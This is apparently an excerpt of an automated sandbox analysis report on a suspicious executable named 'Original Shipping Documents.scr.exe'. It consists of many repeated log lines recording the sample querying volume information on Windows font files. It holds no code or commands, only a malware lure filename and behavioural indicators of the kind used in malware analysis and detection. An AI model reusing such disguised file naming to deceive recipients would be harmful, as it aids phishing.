Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
